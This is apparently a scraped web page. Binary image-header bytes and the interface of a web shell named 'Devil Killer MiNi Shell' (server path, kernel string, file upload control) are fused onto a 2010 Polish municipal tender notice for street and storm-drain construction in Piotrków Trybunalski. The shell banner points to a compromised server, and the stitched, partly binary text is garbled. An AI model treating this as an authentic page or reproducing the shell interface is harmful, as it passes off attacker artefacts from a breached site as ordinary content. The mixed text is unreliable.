JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100806/241000-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: BUDOWĘ ULIC WRAZ Z KANALIZACJĄ DESZCZOWĄ NA OSIEDLU JEZIORNA I</b><br>
<b>Numer ogłoszenia: 241000 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWĘ ULIC WRAZ Z KANALIZACJĄ DESZCZOWĄ NA OSIEDLU JEZIORNA I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest:

Budowa ulic wraz z kanalizacją deszczową na osiedlu Jeziorna I. 

Zakres rzeczowy obejmuje:

1.	W zakresie drogowym - budowę ulic  wraz  z  zjazdami do posesji:

- ulica Chabrowa,
- ulica Daliowa,
- ulica Żołędziowa (od ulicy Liliowej do ulicy Świeżej),
- ulica Baśniowa (od ulicy Liliowej do ulicy Rusałki).
- zjazd do posesji ul. Baśniowa nr 13.

2. W zakresie instalacyjnym - budowę kanalizacji deszczowej wraz                      z przykanalikami do wpustów i posesji w ulicach: 

- ulica Chabrowa,
- ulica Daliowa,
- ulica Żołędziowa (od ulicy Liliowej do ulicy Świeżej),
- ulica Baśniowa (od ulicy Liliowej do ulicy Rusałki).

Szczegółowy  zakres  prac  zawierają:  projekt budowlany oraz Specyfikacja techniczna.
	
I. Zakres robót drogowych  obejmuje:
- Roboty  rozbiórkowe,
- Roboty  ziemne,
- Warstwę  odsączającą z piasku,
- Krawężniki  betonowe 15x30x100,
- Podbudowę z kruszyw łamanych grub. 20 cm,
- Budowę jezdni bitumicznych (warstwa wiążąca-4cm, 
	warstwa ścieralna-4cm), o szerokości: 
- ul. Chabrowa - 5 m,
- ul. Daliowa - 6 m oraz ciąg pieszo-jezdny szer. 4 m.
- ul. Żołędziowa - 6 m,
- ul. Baśniowa - 6 m. 
- Regulację studzienek  i  zasuw.
- Zjazdy do posesji z kostki betonowej czerwonej,
- Zjazd do posesji nr 13 na ul. Baśniowej,
- Roboty  wykończeniowe,
- Oznakowanie  pionowe.

II.Roboty instalacyjne - budowa kanalizacji deszczowej

- Roboty  rozbiórkowe,
- Roboty  ziemne, wywóz ziemi na teren Wykonawcy, podsypka, zasypka, pełna wymiana gruntu, zagęszczenie do wskaźnika zgodnego z SST i PT,
- Roboty montażowe, rury i kształtki PVC SN8,  studnie żelbetowe, kineta prefabrykowana, połączenie kręgów na uszczelki, właz żeliwny z wypełnieniem betonowym z uszczelką wtopioną w korpus, osadzone szczelne przejścia, wpusty uliczne betonowe 500, zwieńczenie kl.D400, elementy betonowe z zabezpieczeniem antykorozyjnym,

W wycenie  należy  również  uwzględnić:
- Roboty pomiarowe liniowe.
- Roboty transportowe  
- Zabezpieczenie istniejącego uzbrojenia rurami osłonowymi w  miejscach  budowanych sieci.
- Doprowadzenie  do  stanu  pierwotnego, uszkodzonego  terenu  nie  objętego  niniejszym  zakresem  robót.
- Oznakowanie ulic na czas budowy oraz opracowanie projektu organizacji  ruchu  i  poniesienie  kosztów związanych  z  zajęciem pasa drogowego. 
- Koszty  związane  z  wykonaniem  niezbędnych  badań  i  prób.
- Inne roboty  objęte  wymaganą  technologią,
- Koszty związane z wykonaniem i montażem dwóch sztuk tablic informacyjnych o wymiarach 2,00x1,00m według załączonego wzoru.

Roboty będą współfinansowane ze  środków  WFOŚiGW.

Przedmiotem zamówienia jest całość robót  określonych  w  projekcie  budowlanym i  specyfikacjach  technicznych wykonania  i  odbioru  robót .
Ponadto  wykonawca  robót  wyłoniony w drodze przetargu 
zobowiązany jest  do:
-   przedstawienia  i  uzgodnienia  miesięcznego  harmonogramu rzeczowo - finansowego robót,
- zapewnienie kompleksowej obsługi geodezyjnej inwestycji oraz wykonanie geodezyjnej inwentaryzacji powykonawczej przez uprawnionego  geodetę              w  4 egz, na  koszt  własny,
-	opracowanie dokumentacji powykonawczej w 4 egzemplarzach dla poszczególnych  branż,
-	uporządkowaniu  terenu  po  zakończeniu  prac,
-	przeprowadzenie kamerą inspekcyjną inspekcji kanału deszczowego wraz  z przykanalikami po ich ułożeniu oraz dołączenie raportu do dokumentacji odbiorowej (koszt ułożenia kanałów deszczowych wycenić wraz z  ceną ich inspekcji),
-	dokonywanie odbiorów częściowych  oraz  robót zanikających  przed  ich  zakryciem,
-	prowadzenie  książki  obmiarów  wraz  z potwierdzeniem wykonanych  robót przez inspektora nadzoru i uprawnionego geodetę (szkice, pomiary geodezyjne),
-	uzyskanie koniecznych  zezwoleń  i  uiszczenie stosownych  opłat, 
-	właściwe oznakowanie robót, zabezpieczenie wykopów przed dostępem osób trzecich, wykonanie przejść dla pieszych,
-	dostarczenie, zainstalowanie i obsługa wszystkich tymczasowych urządzeń zabezpieczających takich jak: zapory, światła ostrzegawcze, sygnały, ogrodzenia, poręcze itp. niezbędne do ochrony robót, zapewniające bezpieczeństwo pojazdów i pieszych,
-	wykonanie koniecznych badań zagęszczenia gruntu celem odtworzenia i odbudowy nawierzchni drogowych zgodnie z wytycznymi i odrębnymi  przepisami. Wskaźniki zagęszczenia gruntu oznaczyć zgodnie z normą BN-77/8931-12.
-	Wykonawca  odpowiada  za  ochronę  instalacji  na  powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp. oraz uzyska od właścicieli  tych urządzeń potwierdzenie informacji otrzymanych  od Zamawiającego w zakresie planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie                    i  zabezpieczenie przed uszkodzeniem tych instalacji   i  urządzeń  w czasie trwania budowy.
-	Wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają być wykonane w zakresie przełożenia instalacji  i  urządzeń podziemnych na terenie budowy i powiadomić inspektora nadzoru  oraz władze lokalne o zamiarze rozpoczęcia  robót. 
O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi inspektora nadzoru  i  zainteresowane władze oraz będzie z nimi współpracował dostarczając wszelkiej pomocy  potrzebnej  przy dokonywaniu  napraw. 
Wykonawca będzie  odpowiadał  za  wszelkie spowodowane   działania uszkodzenia  instalacji  na powierzchni  ziemi  i  urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez Zamawiającego. 
- Wykonawca  zobowiązany  jest  zaplanować  wszystkie  czynności  dla  prawidłowej  realizacji  zamówienia,  zgodnie  z  zasadami  sztuki  budowlanej         i  obowiązującymi  przepisami  bez  względu  na  to,  czy  czynności (prace)  te  są  odrębnie  wymienione  w  jakimkolwiek  załączonym  dokumencie.

Koszty  zabezpieczenia  terenu  budowy  wchodzą  w  zakres umowy  i  nie   podlegają odrębnej  zapłacie.

Wymagania  ogólne  wykonania robót.

-  przed  przystąpieniem  do  przetargu  należy dokonać wizji lokalnej  obiektu  w  miejscu  realizacji zamówienia,
-  wszystkie roboty winny być prowadzone zgodnie z Prawem Budowlanym przez osoby posiadające:
- uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności: konstrukcyjno - budowlanej w zakresie budowy dróg, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych oraz posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa.

 Zamówienie  należy  wykonać zgodnie z  projektem budowlanym, oraz Szczegółową Specyfikacją  Techniczną   wykonania  i  odbioru  robót.

- wszystkie materiały użyte do budowy  muszą  posiadać: 
- Certyfikat  na znak bezpieczeństwa  wykazując, że zapewniono   
      zgodność z kryteriami właściwych  przepisów i  dokumentów   
      technicznych.
-Deklaracje zgodności lub certyfikaty, odpowiednie świadectwa jakości,  atesty i  karty gwarancyjne, recepty  i ustalenia technologiczne zgodnie z  SST,  odpowiadające normom UE.
-	Rozpoczęcie prac należy zgłosić do odpowiednich  jednostek - gestorów sieci, celem poinformowania o  w/w robotach  i  czasie  ich  trwania.
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących 	bezpieczeństwa i higieny pracy zgodnie z  rozporządzeniem Ministra Infrastruktury z dn. 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. Nr 47, poz.401)
- warunkiem koniecznym dla prawidłowego przygotowania oferty przetargowej  jest  	zapoznanie  się z projektem budowlanym dotyczącym przedmiotowego zamówienia. 
Materiały  przetargowe   dostępne  są   do  wglądu  w Urzędzie Miasta w Biurze Inwestycji  i  Remontów  ul. Szkolna 28,97-300 Piotrków Trybunalski pok. 36 ( tel.  0 - 44 -  732 - 18 - 31 ) 


Zakres  prac  drogowych  jest   mniejszy,  niż  określa  projekt  budowlany.

UWAGI  DO  UMOWY:
          Za wykonanie przedmiotu zamówienia  przyjęto  wynagrodzenie ryczałtowe.
1.	Wykonawca przez cały czas trwania umowy będzie posiadał ważne ubezpieczenie od odpowiedzialności cywilnej, wniesie zabezpieczenie należytego wykonania umowy oraz złoży zabezpieczenie roszczeń  z tytułu rękojmi za wady lub gwarancji  jakości.
2.	Materiały kwalifikujące się do ponownego wbudowania należy składować w miejscu wskazanym przez Miejski Zarząd Dróg                        i Komunikacji w Piotrkowie Tryb.

ZMIANY POSTANOWIEŃ UMOWY

Postanowienia niniejszej umowy będą mogły zostać zmienione w stosunku do jej treści, jeżeli wystąpią następujące okoliczności :
1.	Wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin wykonania przedmiotu zamówienia.
2.	Wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia a nie wynikających z przyczyn leżących po stronie Wykonawcy.
3.	Wystąpią wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające w okresie ich występowania, realizację przedmiotu zamówienia i mające wpływ na termin wykonania.
4.	Zostały ujawnione wady opracowania projektowego lub rozbieżności pomiędzy projektem budowlanym, projektem wykonawczym i przedmiarem robót                     o których zamawiający nie posiadał wiedzy, a które mają wpływ na termin lub koszt realizacji przedmiotu zamówienia.
5.	Jeżeli zostaną ujawnione elementy infrastruktury podziemnej, dotychczas niezinwentaryzowanej w zasobach zamawiającego, będące przyczyną kolizji, których usunięcie będzie powodowało prace dotychczas nieprzewidziane.

Zmiany te będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie zamówienia jest, lub przewiduje się, że będzie, opóźnione na skutek tych działań,         a w odniesieniu do pkt. 1,4 i 5 również z uwzględnieniem skutków finansowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.
1.	Wykonawca zobowiązany jest do wniesienia wadium do dnia 26.08.2010 r. do godz. 9:00 w wysokości 30.000,00 zł. 
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu wpłaconym przelewem na rachunek bankowy BGŻ O/Piotrków Tryb. Nr : 05203000451110000000261430 Uwaga: Na poleceniu przelewu należy zamieścić adnotację : Wadium - przetarg nieograniczony na: 
BUDOWĘ ULIC WRAZ Z KANALIZACJĄ DESZCZOWĄ NA OSIEDLU JEZIORNA I
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. (DZ. U. z 2007r. Nr 42 poz. 275)               o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4.	Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.	Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte     w dokumentach i oświadczeniach wyszczególnionych w rozdziale X niniejszej SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujące warunki:
a)	wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia 	o wartości co najmniej 1.000.000 zł brutto każda.            Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą prace polegające na budowie lub przebudowie drogi wraz z kanalizacją deszczową . - wg załącznika nr 4;

W celu potwierdzenia spełniania ww. warunków wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	wykaz wykonanych trzech zamówień w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu o wartości co najmniej 1.000.000,00 zł brutto każda, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W celu potwierdzenia, iż prace zostały wykonane należycie należy dołączyć protokoły odbioru końcowego usług lub referencje - wg załącznika nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte     w dokumentach i oświadczeniach wyszczególnionych w rozdziale X niniejszej SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujące warunki:
b)	wskazać osoby, które będą uczestniczyć w charakterze kierownika budowy i kierowników robót w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 3. Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności: konstrukcyjno - budowlanej w zakresie budowy dróg, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa.

W celu potwierdzenia spełniania ww. warunków wykonawcy zobowiązani są przedłożyć następujące dokumenty:
b)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z dokumentami potwierdzającymi posiadanie uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności: konstrukcyjno - budowlanej w zakresie budowy dróg, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa. Informacja o podstawie do dysponowania tymi osobami - wg załącznika nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte     w dokumentach i oświadczeniach wyszczególnionych w rozdziale X niniejszej SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
